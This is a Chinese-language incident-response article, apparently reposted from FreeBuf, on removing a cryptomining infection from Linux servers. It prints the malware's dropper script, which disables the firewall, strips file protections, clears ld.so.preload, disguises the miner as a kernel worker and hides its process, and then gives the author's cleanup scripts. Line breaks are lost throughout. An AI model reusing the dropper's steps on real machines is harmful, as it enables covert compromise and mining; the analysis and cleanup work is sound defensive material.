企业挖矿病毒处置实战——专杀脚本从0到1

#!/bin/bash# 删除当前用户的 crontab 任务crontab -r 2>/dev/null# 禁用 Uncomplicated Firewallufw disable 2>/dev/null# 设置 iptables 防火墙规则，允许所有入站、出站和转发的流量，清空 iptables 规则iptables -P INPUT ACCEPT 2>/dev/nulliptables -P OUTPUT ACCEPT 2>/dev/nulliptables -P FORWARD ACCEPT 2>/dev/nulliptables -F 2>/dev/null# 移除系统文件的不可修改属性chattr -i /usr/sbin/ >/dev/null 2>&1chattr -i /usr/bin/ >/dev/null 2>&1chattr -i /bin/ >/dev/null 2>&1chattr -i /usr/lib >/dev/null 2>&1chattr -i /usr/lib64 >/dev/null 2>&1chattr -i /usr/libexec >/dev/null 2>&1chattr -i /etc/ >/dev/null 2>&1chattr -i /tmp/ >/dev/null 2>&1chattr -i /sbin/chattr -i /etc/resolv.confchattr -i /etc/cron.d/systeml >/dev/null 2>&1chattr -i /etc/cron.weekly/systeml >/dev/null 2>&1chattr -i /etc/cron.hourly/systeml >/dev/null 2>&1chattr -i /etc/cron.daily/systeml >/dev/null 2>&1chattr -i /etc/cron.monthly/systeml >/dev/null 2>&1# 移除 ld.so.preload 文件的不可修改属性并清空文件内容chattr -ia /etc/ld.so.preload 2>/dev/nullcat /dev/null > /etc/ld.so.preload 2>/dev/null# 通过检查是否存在包含以前文件名的文件，生成或读取两个随机的文件名，并将它们保存在 if [ -e "/usr/lib/systemd/previous_filenames1" ] && [ -e "/usr/lib/systemd/previous_filenames2" ]; thenread -r file1 < "/usr/lib/systemd/previous_filenames1"read -r file2 < "/usr/lib/systemd/previous_filenames2"elsefile1="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"file2="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"echo "$file1" > "/usr/lib/systemd/previous_filenames1"echo "$file2" > "/usr/lib/systemd/previous_filenames2"fimv x86_64 "$file1" 2>/dev/nullmv i386 "$file2" 2>/dev/null# 设置变量SERVICE="kworker2:0H"EXEC="kworker2:0H"DIR="/tmp"# 移除某些文件的不可修改、不可删除、不可设置属性chattr -iaus /etc/cron.*/$EXEC /etc/init.d/$EXEC 2>/dev/null# Check if the process is runningif P=$(pgrep -F /bin/.locked) >> /dev/null; thenecho "Running" && exitelseecho "Not running"echo -n > /bin/.locked# Copy the files to the temporary directorycp "$file1" "$DIR/$EXEC" 2>/dev/nullcp "$file2" "$DIR/neo" 2>/dev/nullchmod +x "$DIR/$EXEC" 2>/dev/nullchmod +x "$DIR/neo" 2>/dev/null"$DIR/$EXEC" --tls >/dev/null 2>&1rm -rf "$DIR/$EXEC"fisleep 2# Check if the process is running and update the lock fileif P1=$(pgrep "$EXEC") 2>/dev/null; thenecho $P1 > /bin/.locked 2>/dev/nullfi# Execute the command using the value stored in the lock file"$DIR/neo" "$(cat /bin/.locked)" 2>/dev/null/bin/nuBrWiVa

if [ -e /bin/.locked ]; thenp=$(cat /bin/.locked)read -ra PID <<< "$p"for pid_value in "${PID[@]}"; doecho "[-] Processing PID: $pid_value"# 执行umount操作umount -l /proc/$pid_value# 查找并杀死与PID相关的进程（如果需要的话）a=$(ps -ef | grep $pid_value | grep "kworker2:0H")if [ -n "$a" ]; thenkill -9 $pid_valueecho "[+] Evil process with PID $pid_value killed"fidoneelseecho "[+] Nothging"fi

evil_cron=($(grep -r -l  "root /bin/.*1 1" /etc/cron.*))for value in "${evil_cron[@]}"; doecho "[+] evil_cron: $value"rm -rf $valueecho "[+] evil_cron:$value 已删除"done

process_name=($(grep -rn "root /bin/.*1 1" /etc/cron.* | awk '{print $(NF-2)}'))echo "[+] process_name: $process_name"mv "$process_name" /tmp/evil_1112server_pid=($(ps -ef | grep $process_name | grep -v 'grep /bin' | awk '{print $2}'))for value in "${server_pid[@]}"; doecho "[+] server_pid: $value"doneserver_name=($(systemctl status $value | grep "Loaded:" | awk '{print $3}' | awk -F'/' '{print $NF}' | sed 's/;//'))for value in "${server_name[@]}"; doecho "[+] server_name: $server_name"breakdonesystemctl stop  $server_namesystemctl disable $server_nameserver_path=/usr/lib/systemd/system/rm -rf  $server_path$server_nameecho "server  deleted"

file_path1="/usr/lib/systemd/previous_filenames1"if [ -e "$file_path1" ]; thenfile_content=$(cat "$file_path1")echo "File $file_path1 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112elseecho "File $file_path1 does not exist."fifile_path2="/usr/lib/systemd/previous_filenames2"if [ -e "$file_path2" ]; thenfile_content=$(cat "$file_path2")echo "File $file_path2 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112elseecho "File $file_path1 does not exist."fi

#! /bin/bashhostnameif [ ! -d "/tmp/evil_1112" ]; thenmkdir /tmp/evil_1112fi#查找特征文件并备份file_path1="/usr/lib/systemd/previous_filenames1"if [ -e "$file_path1" ]; thenfile_content=$(cat "$file_path1")echo "[+] File $file_path1 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112 2>/dev/nullelseecho "[+] File $file_path1 does not exist."fifile_path2="/usr/lib/systemd/previous_filenames2"if [ -e "$file_path2" ]; thenfile_content=$(cat "$file_path2")echo "File $file_path2 exists, and its content is: $file_content"mv "$file_content" /tmp/evil_1112 2>/dev/nullelseecho "File $file_path1 does not exist."fi#查找服务并停止process_name=($(grep -rn "root /bin/.*1 1" /etc/cron.* | awk '{print $(NF-2)}' | uniq))if [ -z "$process_name" ]; thenecho "[+] process name is not exist"elseecho "[+] process_name: $process_name"mv "$process_name" /tmp/evil_1112fievil_process=$(ps -ef | grep -E " /bin/w+{8}" | awk '{print $8}' | uniq)if [ -z "$evil_process" ]; thenecho "[+] evil process is not running"elseif [[ "$evil_process" == "$process_name" ]]; then echo "[+] evil process $evil_process is running"server_pid=($(ps -ef | grep $process_name | grep -v 'color' | awk '{print $2}'))for value in "${server_pid[@]}"; doecho "[+] evil server_pid: $value"doneserver_name=($(systemctl status $value | grep "Loaded: loaded" | awk '{print $3}' | awk -F'/' '{print $NF}' | sed 's/;//'))for value in "${server_name[@]}"; doecho "[+]  evil server_name: $server_name"breakdonesystemctl stop  $server_namesystemctl disable $server_nameserver_path=/usr/lib/systemd/system/rm -rf  $server_path$server_nameecho "[+] evil server deleted"else echo "[+] evil process is not running"fifi#查找计划任务并删除evil_cron=($(grep -r -l  "root /bin/.*1 1" /etc/cron.*))for value in "${evil_cron[@]}"; doecho "[+] evil cron: $value"rm -rf $valueecho "[+] evil cron:$value deleted"done#查找外联进程并killif [ -e /bin/.locked ]; thenp=$(cat /bin/.locked)read -ra PID <<< "$p"for pid_value in "${PID[@]}"; doecho "[-] Processing PID: $pid_value"# 执行umount操作umount -l /proc/$pid_value 2>/dev/null# 查找并杀死与PID相关的进程（如果需要的话）a=$(ps -ef | grep $pid_value | grep "kworker2")if [ -n "$a" ]; thenkill -9 $pid_valueecho "[+] Evil process with PID $pid_value killed"fidoneelseecho "[+] Nothging"fi

文章来源：https://www.freebuf.com/articles/network/390612.html文章作者：Xbxhjx如有侵权，联系删除